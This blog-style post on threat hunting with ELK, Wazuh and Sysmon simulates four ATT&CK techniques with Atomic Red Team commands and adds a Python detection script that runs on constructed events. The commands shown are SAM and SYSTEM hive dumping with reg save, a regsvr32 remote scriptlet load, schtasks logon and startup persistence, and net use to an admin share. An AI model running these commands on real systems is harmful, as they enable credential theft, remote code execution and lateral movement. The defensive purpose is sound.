Threat Hunting with ELK + Wazuh
With Sysmon configured on the endpoints, an ELK + Wazuh stack greatly facilitates threat hunting operations.
The threat landscape grows day by day, and adversaries employ increasingly sophisticated techniques to stay under the radar. It is therefore important for SOC teams to accelerate their detection capabilities so that well-known TTPs are identified in the first place.
This post highlights how detection capabilities can be built on top of Sysmon, a staple of the blue team's arsenal. The blue-team rule of thumb: the more quality logs an organization stores, the easier detection becomes.
To get started, the following open-source tools are used:
- ELK
- Wazuh
- Sysmon (with the sysmon-modular configuration)
- Atomic Red Team (ART)
Background: Wazuh is an open-source HIDS forked from OSSEC. It acts as a host-based intrusion detection system, detects rootkits, and ships endpoint logs to a SIEM for security analytics. It also offers further features such as File Integrity Monitoring, vulnerability detection and compliance checks.
Atomic Red Team (ART) ships test scenarios for many MITRE ATT&CK techniques. Its coverage for Windows is indexed here:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md
The techniques below are simulated here, and the same activity can be used to write correlation rules in the SIEM. (The IDs are those of the ATT&CK matrix at the time of writing, before sub-techniques were introduced; T1117 has since been folded into T1218.010 and T1077 into T1021.002.)
- T1003 — Credential Dumping
- T1037 — Logon Scripts && T1053 — Scheduled Task
- T1018 — Remote System Discovery && T1077 — Windows Admin Shares
- T1117 — Regsvr32
OKAY!! Let us get practical and see how the results appear for these MITRE techniques ʕ•ᴥ•ʔ
1. T1003 — Credential Dumping
Credential dumping is the process of obtaining account credentials, typically usernames with clear-text passwords or password hashes, and Kerberos tickets. Once dumped, they let the attacker carry out a chain of follow-on activities to reach their objectives.
Credentials are stored in, or can be retrieved from, several places on Windows. Some of them are:
- SAM
- LSA Secrets
- Lsass.exe process memory
- Service Principal Names (SPN)
- Cached Credentials
- Registry hive files
There is confirmed evidence that adversaries have used some of the tools below to fetch this credential information in past compromises:
- Mimikatz
- gsecdump
- secretsdump (Impacket)
- Windows Credential Editor (WCE)
- Metasploit modules
- PowerSploit
- Empire
Let us see what SAM dumping looks like as a SIEM incident.
Commands used on the victim machine (the SYSTEM hive carries the boot key needed to decrypt the SAM hashes offline, so the saves normally appear together):
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
The alerts received on ELK —
2. T1117 — Regsvr32
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, including dynamic link libraries (DLLs), on Windows systems. Because it is a signed Microsoft binary, it can be abused to proxy the execution of arbitrary code: with the /i switch and scrobj.dll it loads a COM scriptlet (.sct), even from a remote URL (the "Squiblydoo" technique used below). Regsvr32.exe can also be leveraged to register a COM object used to establish persistence via Component Object Model hijacking.
Command used on the victim machine:
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
The alerts received on ELK —
3. T1037 — Logon Scripts && T1053 Scheduled Task
Commands used on the victim machine (the first task fires on user logon, the second at system startup as SYSTEM; Sysmon records the schtasks.exe process creation with the full command line, which is what the detection keys on):
schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
The alerts received on ELK —
4. T1018 — Remote System Discovery && T1077 — Windows Admin Shares
Command used on the victim machine (net.exe spawns net1.exe, so Sysmon logs the command line on both processes as well as on the cmd.exe wrapper):
cmd.exe /c "net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator"
The alerts received on ELK —
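As an added example, and not code from the original post, from Wazuh or from Atomic Red Team, the following script applies detection logic for all four simulated techniques (the reg.exe hive saves, the regsvr32 scriptlet load, the schtasks logon/startup tasks and the net use to an admin share) to constructed Sysmon Event ID 1 records in the JSON shape Wazuh forwards to Elasticsearch. The field layout (data.win.system.eventID, data.win.eventdata.image / commandLine / parentImage), the agent name, user, paths and the sample events are all assumptions made for this example; the alert levels are illustrative, not Wazuh's own rule levels.

```python
"""Detection logic for the four simulated techniques (added example, not
code from the original post, Wazuh or Atomic Red Team).

Each record mimics a Sysmon Event ID 1 (process creation) event after
Wazuh's Windows eventchannel decoder has turned it into JSON.  The field
layout and the sample events are assumptions, not captured telemetry.
"""
import json
import re

# Patterns are applied to the lower-cased command line.
HIVE_DUMP = re.compile(r"\bsave\b.*\bhklm\\(sam|system|security)\b")
REGSVR32_SCT = re.compile(r"(/i:\S*https?:|\bscrobj\.dll\b)")
SCHTASKS_CREATE = re.compile(r"/create\b")
SCHTASKS_TRIGGER = re.compile(r"/sc\s+(onlogon|onstart)\b")
SCHTASKS_SYSTEM = re.compile(r"/ru\s+(system|nt authority\\system)\b")
ADMIN_SHARE = re.compile(r"\buse\b\s+\\\\[^\\\s]+\\(admin|ipc|[a-z])\$")


def _field(event, *path):
    """Walk nested dicts; return "" for anything missing or non-string."""
    cur = event
    for key in path:
        if not isinstance(cur, dict):
            return ""
        cur = cur.get(key, "")
    return cur if isinstance(cur, str) else ""


def detect(event):
    """Return a list of alert dicts for one decoded Wazuh/Sysmon event.
    Levels use Wazuh's 0-15 scale but the values are illustrative."""
    alerts = []
    if _field(event, "data", "win", "system", "eventID") != "1":
        return alerts  # only process-creation events are inspected
    image = _field(event, "data", "win", "eventdata", "image").lower()
    cmd = _field(event, "data", "win", "eventdata", "commandLine").lower()
    exe = image.rsplit("\\", 1)[-1]
    host = _field(event, "agent", "name")

    def add(techniques, rule, level):
        alerts.append({"host": host, "techniques": techniques, "rule": rule,
                       "level": level, "image": image, "commandLine": cmd})

    # T1003: SAM needs the SYSTEM hive's boot key, so the saves come in pairs.
    if exe == "reg.exe" and HIVE_DUMP.search(cmd):
        add(["T1003"], "reg.exe save of SAM/SYSTEM/SECURITY hive", 12)
    # T1117: scriptlet loaded through scrobj.dll, or /i: pointing at a URL.
    if exe == "regsvr32.exe" and REGSVR32_SCT.search(cmd):
        add(["T1117"], "regsvr32.exe loading a COM scriptlet", 12)
    # T1053 for any task creation; T1037 as well when the trigger is logon/boot.
    if exe == "schtasks.exe" and SCHTASKS_CREATE.search(cmd):
        techniques, level = ["T1053"], 7
        if SCHTASKS_TRIGGER.search(cmd):
            techniques.append("T1037")
            level = 9
        if SCHTASKS_SYSTEM.search(cmd):
            level = 11  # the task will run as SYSTEM
        add(techniques, "schtasks.exe task creation", level)
    # T1077: the string appears on net.exe, net1.exe and the cmd.exe wrapper,
    # so no image filter; explicit credentials raise the level.
    if ADMIN_SHARE.search(cmd):
        level = 8 if re.search(r"/u(ser)?:", cmd) else 6
        add(["T1077"], "net use to an administrative share", level)
    return alerts


def run_ndjson(text):
    """Run detect() over newline-delimited JSON (the alerts.json shape)."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            alerts.extend(detect(json.loads(line)))
    return alerts


def _event(image, command_line, parent=r"C:\Windows\System32\cmd.exe"):
    # Constructed sample record; agent name, user and paths are invented.
    return {"agent": {"name": "WIN10-VICTIM"},
            "data": {"win": {"system": {"eventID": "1",
                                        "providerName": "Microsoft-Windows-Sysmon"},
                             "eventdata": {"image": image, "commandLine": command_line,
                                           "parentImage": parent,
                                           "user": r"DOMAIN\victim"}}}}


SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    _event(SYS32 + r"\reg.exe", r"reg  save HKLM\sam C:\Users\victim\AppData\Local\Temp\sam"),
    _event(SYS32 + r"\reg.exe", r"reg  save HKLM\system C:\Users\victim\AppData\Local\Temp\system"),
    _event(SYS32 + r"\regsvr32.exe",
           "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/"
           "atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"),
    _event(SYS32 + r"\schtasks.exe",
           r'schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"'),
    _event(SYS32 + r"\schtasks.exe",
           r'schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"'),
    _event(SYS32 + r"\net.exe", r"net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator"),
    # Benign noise that must not fire.
    _event(SYS32 + r"\reg.exe", r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion"),
    _event(SYS32 + r"\schtasks.exe", "schtasks /query /fo LIST"),
]
SAMPLE_NDJSON = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in run_ndjson(SAMPLE_NDJSON):
        print(f"[{a['host']}] level {a['level']:>2} {','.join(a['techniques'])}: "
              f"{a['rule']} -> {a['commandLine']}")
```

Each predicate maps one-to-one onto a Wazuh rule matching on the decoded command-line field or onto a Kibana search, so the script doubles as a checklist of what the correlation rules need to key on; the two benign events at the end of the sample set are there to show that plain reg query and schtasks /query activity stays silent.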
Big shout out to Olaf Hartong (@olafhartong) and the Atomic Red Team (ART) project; their work was used here for learning purposes.
Happy Blue Teaming!